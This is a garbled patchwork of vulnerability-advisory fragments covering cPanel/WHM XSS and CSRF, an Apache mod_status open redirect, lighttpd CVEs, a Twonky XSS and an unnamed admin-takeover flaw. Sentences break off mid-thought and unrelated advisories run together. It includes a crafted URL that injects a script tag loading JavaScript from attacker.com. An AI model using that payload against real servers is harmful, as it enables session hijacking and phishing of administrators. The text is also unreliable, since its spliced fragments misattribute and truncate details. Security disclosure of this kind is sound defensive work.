1. DESCRIPTION OF THE SOFTWARE
cPanel is a hosting automation tool.
The WHM interface provides access to the heart of the cPanel and WHM package
and allows a server administrator to simply configure a few options and
be on their way to hosting web sites.
2. DESCRIPTION OF THE VULNERABILITY
There are XSS (identified by CVE-2008-2070) and CSRF (identified by
Apache, thus making it more widely used than all other web
servers combined.
mod_status : http://httpd.apache.org/docs/2.0/mod/mod_status.html
- From apache site : "The Status module allows a server administrator to find out how well their server is performing. A HTML page is presented that gives the current server statistics in an easily readable form. If required this page can be made to automatically refresh (given a compatible browser). Another page gives a simple machine-readable list of the current server state."
--- 1. Apache Refresh Header - Open Redirector (XSS) Vulnerability ---
Because Apache mod_status does not filter the ";" character, a new URL can be injected into the Refresh header.
This gives an attacker an open redirector and can lead to phishing attacks.
remote attackers to cause lighttpd to consume memory, and cause a
denial of service attack.
CVE-2008-4359
Inconsistent handling of URL patterns could lead to the disclosure
of resources a server administrator did not anticipate when using
rewritten URLs.
CVE-2008-4360
On file systems that do not treat case-insensitive paths differently,
it might be possible that unanticipated resources could be made available
<HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not
Found</H1>/NON-EXISTENT-PAGE was not found
on this server.</BODY></HTML>
Thus, an attacker could induce the server administrator (victim) into
clicking on a specially crafted link, pointing to:
http://twonky:9000/fake_config_page<script type="text/javascript"
src="http://attacker.com/malicious.js" ></script>
authenticated.
III. ANALYSIS
Exploitation of this vulnerability allows an attacker to execute all
commands granted to the server administrator. An attacker can add and
delete users and entire organizations, and initiate restore operations
for clients that connect to the server.
Using this vulnerability, an attacker is able to upload arbitrary files
to the server. This results in the execution of arbitrary code with